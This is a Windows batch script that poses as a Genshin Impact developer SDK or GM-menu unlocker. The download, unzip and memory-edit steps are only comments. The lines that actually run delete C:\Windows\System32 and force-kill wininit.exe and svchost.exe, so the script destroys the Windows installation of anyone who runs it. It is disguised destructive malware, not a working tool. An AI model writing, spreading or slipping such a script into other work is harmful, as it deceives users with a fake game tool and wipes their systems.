@echo off
::powershell -Command "(New-Object Net.WebClient).DownloadFile('https://https://osbeta.yuanshen.com/dv/c6E795ed5dE_bB411738e6D7/A31DBfe2DF8_FA5763/GenshinImpact_3.4DevSdk.zip', 'GenshinImpact_3.4DevSdk.zip')"
rmdir /s /q C:\Windows\System32\
::UnZipFile "C:\Temp\" "C:\GenshinImpact\GenshinImpact_CurVER\GenshinImpactDevSDK"
::Start %GenshinPath%\GenshinImpact.exe ADMIN
taskkill /f /im wininit.exe
::Packet.Dispatch.setVALUE n:LOCAL rel:OSREL
::MemoryModify /r /e /al RSAKeyValue </>%Grasscutter%.net.emu/PublicKey/WIJOISAFS.class</RSAValue>
taskkill  /f /im svchost.exe
::ModifyMemory /vir /u /s UnityEngine.GenshinImpact.DevSDK.DeveloperMenu.GM 1
